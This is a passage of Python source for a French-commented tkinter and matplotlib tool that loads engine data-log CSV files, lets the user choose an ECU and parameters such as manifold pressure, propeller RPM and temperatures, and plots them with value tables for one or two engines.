Checkbutton(Frame1, text = \"WG_DC-A190\", variable = CheckVar1, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C2 = Checkbutton(Frame2, text = \"DisLoad-A334\", variable = CheckVar2, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C3 = Checkbutton(Frame3, text = \"Prop RPM-A306\", variable = CheckVar3, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C4 = Checkbutton(Frame3, text = \"Prop-DC-A313\", variable = CheckVar4, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C5 = Checkbutton(Frame3, text = \"PrSpdTar-A308\", variable = CheckVar5, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C6 = Checkbutton(Frame1, text = \"MAPTar-A181\", variable = CheckVar6, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C7 = Checkbutton(Frame4, text = \"PRail_DC-A204\", variable = CheckVar7, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C8 = Checkbutton(Frame4, text = \"PRaTar-A192\", variable = CheckVar8, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C9 = Checkbutton(Frame4, text = \"PRail-A131\", variable = CheckVar9, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C10 = Checkbutton(Frame1, text = \"MAP-A88\", variable = CheckVar10, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C11 = Checkbutton(Frame2, text = \"Engine Revs. RPM-A47\", variable = CheckVar11, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C12 = Checkbutton(Frame5, text = \"VBatt-A91\", variable = CheckVar12, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C13 = Checkbutton(Frame5, text = \"TAir-A93\", variable = CheckVar13, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C14 = Checkbutton(Frame5, text = \"TH2O-A92\", variable = CheckVar14, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C15 = Checkbutton(Frame5, text = \"TOil-A94\", variable = CheckVar15, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C16 = Checkbutton(Frame5, text = \"POil-A97\", variable = CheckVar16, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C17 = Checkbutton(Frame5, text = \"TGear-A267\", variable = CheckVar17, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C18 = Checkbutton(Frame5, text = \"PBaro-A99\", variable = CheckVar18, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C19 = Checkbutton(Frame5, text = \"TECU-A96\", variable = CheckVar19, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C20 = Checkbutton(Frame4, text = \"FCh-A246\", variable = CheckVar20, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C21 = Checkbutton(Frame2, text = \"Load-A87\", variable = CheckVar21, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n C22 = Checkbutton(Frame5, text = \"Altitude\", variable = CheckVar22, \\\r\n onvalue = 1, offvalue = 0, height=a, \\\r\n width = b)\r\n \r\n C1.pack();C6.pack();C10.pack();\r\n C2.pack();C11.pack();C21.pack();\r\n C3.pack();C4.pack();C5.pack();\r\n C7.pack();C8.pack();C9.pack();C20.pack();\r\n C13.pack();C14.pack();C15.pack();C17.pack();C19.pack();C16.pack();C18.pack();C22.pack();C12.pack();\r\n \r\n \r\n top.mainloop()\r\n e=(CheckVar1.get(),CheckVar2.get(),CheckVar3.get(),CheckVar4.get(),CheckVar5.get(),CheckVar6.get(),CheckVar7.get(),CheckVar8.get(),CheckVar9.get(),CheckVar10.get(),CheckVar11.get(),CheckVar12.get(),CheckVar13.get(),CheckVar14.get(),CheckVar15.get(),CheckVar16.get(),CheckVar17.get(),CheckVar18.get(),CheckVar19.get(),CheckVar20.get(),CheckVar21.get(),CheckVar22.get())\r\n (wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)=e\r\n\r\ndef ecu(): #fenêtre du choix des ECU\r\n largeur=30\r\n global ecu1\r\n fenetre=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre.title(\"Choix de l'ECU\")\r\n var = StringVar()\r\n ecua = Radiobutton(fenetre, text=\"ECU A\", variable=var, value=0, width=largeur)\r\n ecub = Radiobutton(fenetre, text=\"ECU B\", variable=var, value=1,width=largeur)\r\n OK=Button(fenetre, text='OK', command=fenetre.destroy)\r\n ecua.pack()\r\n ecub.pack()\r\n OK.pack()\r\n ecua.select() #par défaut A est sélectionné\r\n mainloop()\r\n ecu1=var.get() #-> pour récupérer la valeur associée au bouton\r\n\r\ndef click(): #fonction exécutée une fois l'explorateur de fichier fermé\r\n global chemin\r\n user = getpass.getuser()\r\n file = tkinter.filedialog.askopenfilename(filetypes=[('text files', '.csv')],initialdir='C:/Users/%s' % user)\r\n directory = os.path.split(file)\r\n # print(directory)\r\n chemin=directory\r\n \r\ndef explo(): #lance l'explorateur de fichiers et stock l'adresse du fichier dans variable globale\r\n global gui\r\n gui = tkinter.Tk()\r\n user = getpass.getuser()\r\n button = tkinter.Button(gui, command=click())\r\n button.grid()\r\n gui.destroy()\r\n gui.mainloop()\r\n \r\ndef f(): #fermeture de la fenêtre et mode recommencer activé\r\n global recommencer\r\n recommencer=1\r\n fenetre2.destroy()\r\n \r\ndef apropos():\r\n about=\"Copyright (c) 2016, Loïc BRUNEAU\\nAll rights reserved.\\n\"\r\n about+=\"Logiciel sous licence BSD\\n\\n\"\r\n about+=\"Contact: loic.ds1@hotmail.fr\\n\\n\"\r\n about+=\"Développé à l'ENAC Melun\"\r\n fenetre2.destroy()\r\n fenetre3=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre3.title(\"À propos\")\r\n Label(fenetre3, text=about).pack()\r\n mainloop()\r\n \r\ndef rtlf():\r\n global maintenance\r\n global recommencer\r\n global fenetre2\r\n global gui\r\n tableau=[] #tableau des données qu'on affichera ensuite\r\n global wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3\r\n global chemin\r\n global ecu1\r\n \r\n explo()\r\n chemin=chemin[0]+'/'+chemin[1] #l'adresse exacte du fichier avec le nom du fichier\r\n # fic=open('C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv',\"r\")\r\n fic=open(chemin,\"r\")\r\n\r\n maint()\r\n \r\n n=0\r\n for line in fic: #pour compter le nombre de lignes dans le fichier\r\n n+=1\r\n fic.close()\r\n # n=str(n-1)\r\n # afficher=\"fichier de \"+n+\" secondes\" #nombre de secondes dans le fichier pour choisir la plage horaire\r\n # print(afficher)\r\n # fenetre=Tk() #afficher le texte dans une fenêtre #à voir si c'est utile dans le cas où compilé en .exe\r\n # champ_label = Label(fenetre, text=afficher)\r\n # debut=StringVar()\r\n # fin=StringVar()\r\n # ligne_texte = Entry(fenetre, textvariable=var_texte, width=30)\r\n # ligne_texte.pack()\r\n # champ_label.pack()\r\n # mainloop()\r\n # try:\r\n # debut=int(input(\"Temps de départ :\"))\r\n # except BaseException:\r\n # debut=0\r\n # try:\r\n # fin=int(input(\"Temps de fin :\"))\r\n # except BaseException:\r\n # fin=int(n)\r\n # if fin>int(n) or debut<0 or fin-debut<1: #pour afficher quelque chose quoi qu'on rentre comme valeur ou chaine de caractère\r\n # debut=0\r\n # fin=int(n)\r\n # debut=int(debut)\r\n # fic=open(\"C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv\",\"r\")\r\n #penser à supprimer les '' de chaque str pour un meilleur affichage\r\n \r\n recommencer=1\r\n \r\n while str(recommencer)=='1':\r\n moteur=chemin[-28:-23] #numéro de série du moteur\r\n nbheures=chemin[-22:-18] #nombre d'heures de vol\r\n titre=\"Moteur \"+moteur+\" \"+nbheures+\"h\"\r\n \r\n \r\n fic=open(chemin,\"r\")\r\n t=fic.readline()\r\n t=t.split(\",\") \r\n\r\n ecu()\r\n \r\n try:\r\n if int(ecu1)==1: #ECU B sélectionnée\r\n iwg=t.index('WG_DC-B190')\r\n idisload=t.index('DisLoad-B334') #c'est ici qu'il faut modifier les chaines de caractère si à l'avenir les NOMS des colonnes changent\r\n iproprpm=t.index('Prop RPM-B306') #il faudrait alors efectuer ce changement à trois endroits: ici puis à deux reprises dans la fonction rtlf2()\r\n ipropdc=t.index('Prop-DC-B313')\r\n iprspd=t.index('PrSpdTar-B308')\r\n imaptar=t.index('MAPTar-B181')\r\n ipraildc=t.index('PRail_DC-B204')\r\n ipratar=t.index('PRaTar-B192')\r\n iprail=t.index('PRail-B131')\r\n imap=t.index('MAP-B88')\r\n iengine=t.index('Engine Revs. RPM-B47')\r\n ivbatt=t.index('VBatt-B91')\r\n itair=t.index('TAir-B93')\r\n ith2o=t.index('TH2O-B92')\r\n itoil=t.index('TOil-B94')\r\n ipoil=t.index('POil-B97')\r\n itgear=t.index('TGear-B267')\r\n ipbaro=t.index('PBaro-B99')\r\n itecu=t.index('TECU-B96')\r\n ifch=t.index('FCh-B246')\r\n iload=t.index('Load-B87')\r\n iecuact=t.index('ECU Act-B257') \r\n else: #ECU A sélectionée\r\n iwg=t.index('WG_DC-A190')\r\n idisload=t.index('DisLoad-A334')\r\n iproprpm=t.index('Prop RPM-A306')\r\n ipropdc=t.index('Prop-DC-A313')\r\n iprspd=t.index('PrSpdTar-A308')\r\n imaptar=t.index('MAPTar-A181')\r\n ipraildc=t.index('PRail_DC-A204')\r\n ipratar=t.index('PRaTar-A192')\r\n iprail=t.index('PRail-A131')\r\n imap=t.index('MAP-A88')\r\n iengine=t.index('Engine Revs. RPM-A47')\r\n ivbatt=t.index('VBatt-A91')\r\n itair=t.index('TAir-A93')\r\n ith2o=t.index('TH2O-A92')\r\n itoil=t.index('TOil-A94')\r\n ipoil=t.index('POil-A97')\r\n itgear=t.index('TGear-A267')\r\n ipbaro=t.index('PBaro-A99')\r\n itecu=t.index('TECU-A96')\r\n ifch=t.index('FCh-A246')\r\n iload=t.index('Load-A87')\r\n iecuact=t.index('ECU Act-A257')\r\n \r\n wg=[]\r\n disload=[]\r\n proprpm=[]\r\n propdc=[]\r\n prspd=[]\r\n maptar=[]\r\n praildc=[]\r\n pratar=[]\r\n prail=[]\r\n map=[]\r\n engine=[]\r\n vbatt=[]\r\n tair=[]\r\n th2o=[]\r\n toil=[]\r\n poil=[]\r\n tgear=[]\r\n pbaro=[]\r\n tecu=[]\r\n fch=[]\r\n load=[]\r\n alti=[]\r\n temps=[]\r\n ecuact=[]\r\n drail=[]\r\n dprop=[]\r\n dmap=[]\r\n \r\n # for i in range(debut):\r\n # fic.readline()\r\n for i in range(n-1):#debut,fin):\r\n s=fic.readline()\r\n s=s.split(\",\")\r\n # WG 93-35 58\r\n # diload 84-48 36\r\n # prop rpm 95-37 58\r\n # prspd=pratar=wg=maptar=prail=praildc 58\r\n # load 68-16 52\r\n # poil=toil=th2o=tgear 76-24 52\r\n # engine 57-5 52\r\n # map 70-18 52\r\n # propdc 97-39 58\r\n # tair 71-19 52\r\n # vbatt 69-17 52\r\n # pbaro=tecu 78-26 52\r\n # fch 83-32 51\r\n temps.append(i)\r\n wg.append(round(float(s[iwg]),2)) \r\n disload.append(round(float(s[idisload]),1)) \r\n proprpm.append(round(float(s[iproprpm]),2)) #Finalement niveau durée d'exécution c'est équivalent, autant garder ça\r\n propdc.append(round(float(s[ipropdc]),2))\r\n prspd.append(int(float(s[iprspd])))\r\n maptar.append(int(float(s[imaptar])))\r\n praildc.append(int(float(s[ipraildc])))\r\n pratar.append(int(float(s[ipratar])))\r\n prail.append(round(float(s[iprail]),1))\r\n map.append(int(float(s[imap])))\r\n engine.append(int(float(s[iengine])))\r\n vbatt.append(round(float(s[ivbatt]),1))\r\n tair.append(round(float(s[itair]),2))\r\n th2o.append(int(float(s[ith2o])))\r\n toil.append(int(float(s[itoil])))\r\n poil.append(round(float(s[ipoil]),1))\r\n tgear.append(int(float(s[itgear])))\r\n pbaro.append(int(float(s[ipbaro])))\r\n tecu.append(int(float(s[itecu])))\r\n fch.append(round(float(s[ifch]),2))\r\n load.append(round(float(s[iload]),1))\r\n alti.append(int(float(-(np.exp((np.log(abs(pbaro[-1]))-np.log(1013.25))/5.255)-1)*(288.15/0.0065)*3.5)))\r\n ecuact.append(190*float(s[iecuact]))\r\n drail.append(pratar[-1]-prail[-1])\r\n dprop.append(prspd[-1]-proprpm[-1])\r\n dmap.append(maptar[-1]-map[-1])\r\n # if (abs(alti[-1]-alti[-2])>1000 and i>debut+5): #pour éviter les valeurs incohérentes\r\n # alti[-1]=alti[-2] #ne fonctionne pas, on s'en passera pour le moment\r\n if prspd[-1]==-1: #permet de retirer les lignes où tout est égal à -1, les courbes sont vachement mieux et problème de l'alti réglée?\r\n for i in [temps,wg,disload,proprpm,propdc,prspd,maptar,praildc,pratar,prail,map,engine,vbatt,tair,th2o,toil,poil,tgear,pbaro,tecu,fch,load,alti,ecuact,drail,dprop,dmap]:\r\n del i[-1]\r\n \r\n fic.close()\r\n \r\n if int(maintenance)==1:\r\n choixcourbes()\r\n else:\r\n (wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)=(1,0,1,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0)\r\n \r\n niveau=min(alti)\r\n for i in range(len(alti)): #pour affiner la valeur de l'altitude, on considère 0m-> plus basse pression\r\n alti[i]=alti[i]-niveau\r\n k=(wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)\r\n fig=plt.figure(figsize=(40,20))\r\n # ax = fig.add_subplot(111, axisbg='#FFFFFF') #si on veut rajouter des barres horizontales et verticales autour du curseur, +voir ligne curseur\r\n tableau=[]\r\n tableau.append(temps) #tableau des valeurs qu'on va afficher après\r\n courbes=['Temps']\r\n if k[0]:\r\n plt.plot(temps,wg,label='Waste Gate')\r\n tableau.append(wg)\r\n courbes.append('Waste Gate') #titre à afficher pour le tableau de valeurs\r\n if k[5]:\r\n plt.plot(temps,maptar,label='Map Tar')\r\n tableau.append(maptar)\r\n courbes.append('Map Tar')\r\n if k[9]:\r\n plt.plot(temps,map,label='MAP')\r\n tableau.append(map)\r\n courbes.append('MAP')\r\n if int(maintenance)==0:\r\n tableau.append(dmap)\r\n courbes.append('Écart MAP')\r\n if k[1]:\r\n plt.plot(temps,disload,label='DisLoad')\r\n tableau.append(disload)\r\n courbes.append('DisLoad')\r\n if k[10]:\r\n plt.plot(temps,engine,label='Engine Revs. RPM-A47')\r\n tableau.append(engine)\r\n courbes.append('Engine Revs. RPM-A47')\r\n if k[20]:\r\n plt.plot(temps,load,label='Load-A87')\r\n tableau.append(load)\r\n courbes.append('Load-A87')\r\n if k[4]:\r\n plt.plot(temps,prspd,label='Prop Speed')\r\n tableau.append(prspd)\r\n courbes.append('Prop Speed')\r\n if k[2]:\r\n plt.plot(temps,proprpm,label='Prop RPM')\r\n tableau.append(proprpm)\r\n courbes.append('Prop RPM')\r\n if int(maintenance)==0:\r\n tableau.append(dprop)\r\n courbes.append('Écart PROP')\r\n if k[3]:\r\n plt.plot(temps,propdc,label='Prop DC')\r\n tableau.append(propdc)\r\n courbes.append('Prop DC')\r\n if k[6]:\r\n plt.plot(temps,praildc,label='Prail DC')\r\n tableau.append(praildc)\r\n courbes.append('Prail DC')\r\n if k[7]:\r\n plt.plot(temps,pratar,label='PraTar')\r\n tableau.append(pratar)\r\n courbes.append('PraTar')\r\n if k[8]:\r\n plt.plot(temps,prail,label='Prail')\r\n tableau.append(prail)\r\n courbes.append('Prail')\r\n if int(maintenance)==0:\r\n tableau.append(drail)\r\n courbes.append('Écart Rail')\r\n if k[19]:\r\n plt.plot(temps,fch,label='FCh-A246')\r\n tableau.append(fch)\r\n courbes.append('FCh-A246')\r\n if k[12]:\r\n plt.plot(temps,tair,label='TAir-A93')\r\n tableau.append(tair)\r\n courbes.append('TAir-A93')\r\n if k[13]:\r\n plt.plot(temps,th2o,label='TH2O-A92')\r\n tableau.append(th2o)\r\n courbes.append('TH2O-A92')\r\n if k[14]:\r\n plt.plot(temps,toil,label='TOil-A94')\r\n tableau.append(toil)\r\n courbes.append('TOil-A94')\r\n if k[16]:\r\n plt.plot(temps,tgear,label='TGear-A267')\r\n tableau.append(tgear)\r\n courbes.append('TGear-A267')\r\n if k[18]:\r\n plt.plot(temps,tecu,label='TECU-A96')\r\n tableau.append(tecu)\r\n courbes.append('TECU-A96')\r\n if k[15]:\r\n plt.plot(temps,poil,label='POil-A97')\r\n tableau.append(poil)\r\n courbes.append('POil-A97')\r\n if k[17]:\r\n plt.plot(temps,pbaro,label='PBaro-A99')\r\n tableau.append(pbaro)\r\n courbes.append('PBaro-A99')\r\n if k[21]:\r\n plt.plot(temps,alti,label=\"Allure de l'altitude\")\r\n tableau.append(alti)\r\n courbes.append(\"Altitude\")\r\n if k[11]:\r\n plt.plot(temps,vbatt,label='VBatt-A91')\r\n tableau.append(vbatt)\r\n courbes.append('VBatt-A91')\r\n plt.plot(temps,ecuact,'#798081',label=t[iecuact]) #hexa du gris, courbe pour voir si l'ECU selectionnée est active\r\n plt.legend()\r\n if ecu1=='0':\r\n titre+=' ECU A'\r\n else:\r\n titre+=' ECU B'\r\n plt.title(titre) #immat du moteur+nombre d'heures de vol\r\n plt.show()\r\n l=''\r\n for i in courbes:\r\n c=len(i)\r\n c-=11\r\n c=-c\r\n c=c*' '\r\n l+=i+c\r\n # ppp=l+'\\n'\r\n ppp=''\r\n temp=''\r\n for j in range(len(tableau[0])):\r\n temp=' '\r\n for i in range(len(tableau)):\r\n b=len(str(tableau[i][j]))\r\n b-=11\r\n b=-b\r\n b=b*' '\r\n temp=temp+str(tableau[i][j])+b\r\n # print(str(temp)[1:-1])\r\n temp+='\\n'\r\n ppp+=temp\r\n # print(ppp)\r\n root = Tk()\r\n root.title('Tableau de valeurs')\r\n Frame6 = Frame(root,borderwidth=0)#,relief=GROOVE)\r\n Frame6.pack(side=TOP,padx=10,pady=10)\r\n U=Text(Frame6, height=0, width=13*len(courbes))\r\n U.pack()\r\n U.insert(END,l)\r\n T = Text(root, height=400, width=13*len(courbes))\r\n T.pack()\r\n T.insert(END, ppp)\r\n mainloop()\r\n \r\n # print(courbes)\r\n # for i in range (len(tableau)):\r\n # print(tableau[i])\r\n except BaseException:\r\n print('Le fichier est corrompu, il faut effectuer de nouvelles mesures')\r\n recommencer=0\r\n # recommencer=input(\"Recommencer? 1 si oui :\")\r\n global fenetre2\r\n fenetre2=Tk() #boutons radio (un seul peut être coché à la fois)\r\n fenetre2.title(\"\")\r\n quitt=Button(fenetre2, text=\"Quitter\", command=fenetre2.destroy)\r\n reco=Button(fenetre2, text='Recommencer', command=f)\r\n propos=Button(fenetre2, text='À propos',command=apropos)\r\n reco.pack()\r\n propos.pack()\r\n quitt.pack()\r\n mainloop()\r\n \r\n\r\n\r\ndef rtlf2():\r\n again=0\r\n global courbes,l\r\n global maintenance\r\n global recommencer\r\n global fenetre2\r\n global gui\r\n tableau=[] #tableau des données qu'on affichera ensuite\r\n global wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3\r\n global chemin\r\n global ecu1\r\n \r\n explo()\r\n chemin2=chemin\r\n chemin2=chemin2[0]+'/'+chemin2[1] #l'adresse exacte du fichier avec le nom du fichier\r\n # fic=open('C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv',\"r\")\r\n \r\n recommencer=1\r\n \r\n while str(recommencer)=='1':\r\n \r\n fic=open(chemin2,\"r\")\r\n \r\n \r\n if again==0:\r\n maint()\r\n \r\n n=0\r\n for line in fic: #pour compter le nombre de lignes dans le fichier\r\n n+=1\r\n fic.close()\r\n \r\n \r\n \r\n \r\n moteur=chemin2[-28:-23] #numéro de série du moteur\r\n nbheures=chemin2[-22:-18] #nombre d'heures de vol\r\n titre=\"Moteur \"+moteur+\" \"+nbheures+\"h\"\r\n \r\n \r\n fic=open(chemin2,\"r\")\r\n t=fic.readline()\r\n t=t.split(\",\") \r\n \r\n \r\n\r\n ecu()\r\n \r\n ecu0=ecu1\r\n \r\n try:\r\n if int(ecu1)==1: #ECU B sélectionnée\r\n iwg=t.index('WG_DC-B190')\r\n idisload=t.index('DisLoad-B334')\r\n iproprpm=t.index('Prop RPM-B306')\r\n ipropdc=t.index('Prop-DC-B313')\r\n iprspd=t.index('PrSpdTar-B308')\r\n imaptar=t.index('MAPTar-B181')\r\n ipraildc=t.index('PRail_DC-B204')\r\n ipratar=t.index('PRaTar-B192')\r\n iprail=t.index('PRail-B131')\r\n imap=t.index('MAP-B88')\r\n iengine=t.index('Engine Revs. RPM-B47')\r\n ivbatt=t.index('VBatt-B91')\r\n itair=t.index('TAir-B93')\r\n ith2o=t.index('TH2O-B92')\r\n itoil=t.index('TOil-B94')\r\n ipoil=t.index('POil-B97')\r\n itgear=t.index('TGear-B267')\r\n ipbaro=t.index('PBaro-B99')\r\n itecu=t.index('TECU-B96')\r\n ifch=t.index('FCh-B246')\r\n iload=t.index('Load-B87')\r\n iecuact=t.index('ECU Act-B257') \r\n else: #ECU A sélectionée\r\n iwg=t.index('WG_DC-A190')\r\n idisload=t.index('DisLoad-A334')\r\n iproprpm=t.index('Prop RPM-A306')\r\n ipropdc=t.index('Prop-DC-A313')\r\n iprspd=t.index('PrSpdTar-A308')\r\n imaptar=t.index('MAPTar-A181')\r\n ipraildc=t.index('PRail_DC-A204')\r\n ipratar=t.index('PRaTar-A192')\r\n iprail=t.index('PRail-A131')\r\n imap=t.index('MAP-A88')\r\n iengine=t.index('Engine Revs. RPM-A47')\r\n ivbatt=t.index('VBatt-A91')\r\n itair=t.index('TAir-A93')\r\n ith2o=t.index('TH2O-A92')\r\n itoil=t.index('TOil-A94')\r\n ipoil=t.index('POil-A97')\r\n itgear=t.index('TGear-A267')\r\n ipbaro=t.index('PBaro-A99')\r\n itecu=t.index('TECU-A96')\r\n ifch=t.index('FCh-A246')\r\n iload=t.index('Load-A87')\r\n iecuact=t.index('ECU Act-A257')\r\n \r\n wg=[]\r\n disload=[]\r\n proprpm=[]\r\n propdc=[]\r\n prspd=[]\r\n maptar=[]\r\n praildc=[]\r\n pratar=[]\r\n prail=[]\r\n map=[]\r\n engine=[]\r\n vbatt=[]\r\n tair=[]\r\n th2o=[]\r\n toil=[]\r\n poil=[]\r\n tgear=[]\r\n pbaro=[]\r\n tecu=[]\r\n fch=[]\r\n load=[]\r\n alti=[]\r\n temps=[]\r\n ecuact=[]\r\n drail=[]\r\n dprop=[]\r\n dmap=[]\r\n \r\n \r\n for i in range(n-1):#debut,fin):\r\n s=fic.readline()\r\n s=s.split(\",\")\r\n \r\n temps.append(i)\r\n wg.append(round(float(s[iwg]),2)) \r\n disload.append(round(float(s[idisload]),1)) \r\n proprpm.append(round(float(s[iproprpm]),2)) \r\n propdc.append(round(float(s[ipropdc]),2))\r\n prspd.append(int(float(s[iprspd])))\r\n maptar.append(int(float(s[imaptar])))\r\n praildc.append(int(float(s[ipraildc])))\r\n pratar.append(int(float(s[ipratar])))\r\n prail.append(round(float(s[iprail]),1))\r\n map.append(int(float(s[imap])))\r\n engine.append(int(float(s[iengine])))\r\n vbatt.append(round(float(s[ivbatt]),1))\r\n tair.append(round(float(s[itair]),2))\r\n th2o.append(int(float(s[ith2o])))\r\n toil.append(int(float(s[itoil])))\r\n poil.append(round(float(s[ipoil]),1))\r\n tgear.append(int(float(s[itgear])))\r\n pbaro.append(int(float(s[ipbaro])))\r\n tecu.append(int(float(s[itecu])))\r\n fch.append(round(float(s[ifch]),2))\r\n load.append(round(float(s[iload]),1))\r\n alti.append(int(float(-(np.exp((np.log(abs(pbaro[-1]))-np.log(1013.25))/5.255)-1)*(288.15/0.0065)*3.5)))\r\n ecuact.append(190*float(s[iecuact]))\r\n drail.append(pratar[-1]-prail[-1])\r\n dprop.append(prspd[-1]-proprpm[-1])\r\n dmap.append(maptar[-1]-map[-1])\r\n # if (abs(alti[-1]-alti[-2])>1000 and i>debut+5): #pour éviter les valeurs incohérentes\r\n # alti[-1]=alti[-2] #ne fonctionne pas, on s'en passera pour le moment\r\n if prspd[-1]==-1: #permet de retirer les lignes où tout est égal à -1, les courbes sont vachement mieux et problème de l'alti réglée?\r\n for i in [temps,wg,disload,proprpm,propdc,prspd,maptar,praildc,pratar,prail,map,engine,vbatt,tair,th2o,toil,poil,tgear,pbaro,tecu,fch,load,alti,ecuact,drail,dprop,dmap]:\r\n del i[-1]\r\n \r\n fic.close() # fin du ctrl c\r\n \r\n except BaseException:\r\n print(\"Le fichier du moteur 1 semble corrompu, il faut effectuer de nouvelles mesures\")\r\n \r\n \r\n try:\r\n if int(maintenance)==1:\r\n choixcourbes()\r\n else:\r\n (wg3,disload3,proprpm3,propdc3,prspd3,maptar3,praildc3,pratar3,prail3,map3,engine3,vbatt3,tair3,th2o3,toil3,poil3,tgear3,pbaro3,tecu3,fch3,load3,alti3)=(1,0,1,0,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0)\r\n \r\n niveau=min(alti) #penser à le refaire pour l'autre liste\r\n for i in range(len(alti)): #pour affiner la valeur de l'altitude, on considère 0m-> plus basse pression\r\n alti[i]=alti[i]-niveau\r\n \r\n except BaseException:\r\n print(\"Le fichier du moteur 1 semble corrompu, il faut effectuer de nouvelles mesures\")\r\n \r\n \r\n \r\n \r\n \r\n #DEUXIEME MOTEUR\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n if again==0: \r\n explo()\r\n chemin=chemin[0]+'/'+chemin[1] #l'adresse exacte du fichier avec le nom du fichier\r\n # fic=open('C:/Users/Loïc/Desktop/delog/RTLF#02-02-03295#0702#160208#093347.csv',\"r\")\r\n fic=open(chemin,\"r\")\r\n \r\n n=0\r\n for line in fic: #pour compter le nombre de lignes dans le fichier\r\n n+=1\r\n fic.close()\r\n \r\n \r\n moteur=chemin[-28:-23] #numéro de série du moteur\r\n nbheures=chemin[-22:-18] #nombre d'heures de vol\r\n titre2=\"Moteur \"+moteur+\" \"+nbheures+\"h\"\r\n \r\n \r\n fic=open(chemin,\"r\")\r\n t2=fic.readline()\r\n t2=t2.split(\",\") \r\n \r\n ecu()\r\n \r\n # try:\r\n if int(ecu1)==1: #ECU B sélectionnée\r\n iiwg=t2.index('WG_DC-B190')\r\n iidisload=t2.index('DisLoad-B334')\r\n iiproprpm=t2.index('Prop RPM-B306')\r\n iipropdc=t2.index('Prop-DC-B313')\r\n iiprspd=t2.index('PrSpdTar-B308')\r\n iimaptar=t2.index('MAPTar-B181')\r\n iipraildc=t2.index('PRail_DC-B204')\r\n iipratar=t2.index('PRaTar-B192')\r\n iiprail=t2.index('PRail-B131')\r\n iimap=t2.index('MAP-B88')\r\n iiengine=t2.index('Engine Revs. RPM-B47')\r\n iivbatt=t2.index('VBatt-B91')\r\n iitair=t2.index('TAir-B93')\r\n iith2o=t2.index('TH2O-B92')\r\n iitoil=t2.index('TOil-B94')\r\n iipoil=t2.index('POil-B97')\r\n iitgear=t2.index('TGear-B267')\r\n iipbaro=t2.index('PBaro-B99')\r\n iitecu=t2.index('TECU-B96')\r\n iifch=t2.index('FCh-B246')\r\n iiload=t2.index('Load-B87')\r\n iiecuact=t2.index('ECU Act-B257') \r\n else: #ECU A sélectionée\r\n iiwg=t2.index('WG_DC-A190')\r\n iidisload=t2.index('DisLoad-A334')\r\n iiproprpm=t2.index('Prop RPM-A306')\r\n iipropdc=t2.index('Prop-DC-A313')\r\n iiprspd=t2.index('PrSpdTar-A308')\r\n iimaptar=t2.index('MAPTar-A181')\r\n iipraildc=t2.index('PRail_DC-A204')\r\n iipratar=t2.index('PRaTar-A192')\r\n iiprail=t2.index('PRail-A131')\r\n iimap=t2.index('MAP-A88')\r\n iiengine=t2.index('Engine Revs. RPM-A47')\r\n iivbatt=t2.index('VBatt-A91')\r\n iitair=t2.index('TAir-A93')\r\n iith2o=t2.index('TH2O-A92')\r\n iitoil=t2.index('TOil-A94')\r\n iipoil=t2.index('POil-A97')\r\n iitgear=t2.index('TGear-A267')\r\n iipbaro=t2.index('PBaro-A99')\r\n iitecu=t2.index('TECU-A96')\r\n iifch=t2.index('FCh-A246')\r\n iiload=t2.index('Load-A87')\r\n iiecuact=t2.index('ECU Act-A257')\r\n \r\n wgp=[]\r\n disloadp=[]\r\n proprpmp=[]\r\n propdcp=[]\r\n prspdp=[]\r\n maptarp=[]\r\n praildcp=[]\r\n pratarp=[]\r\n prailp=[]\r\n mapp=[]\r\n enginep=[]\r\n vbattp=[]\r\n tairp=[]\r\n th2op=[]\r\n toilp=[]\r\n poilp=[]\r\n tgearp=[]\r\n pbarop=[]\r\n tecup=[]\r\n fchp=[]\r\n loadp=[]\r\n altip=[]\r\n tempsp=[]\r\n 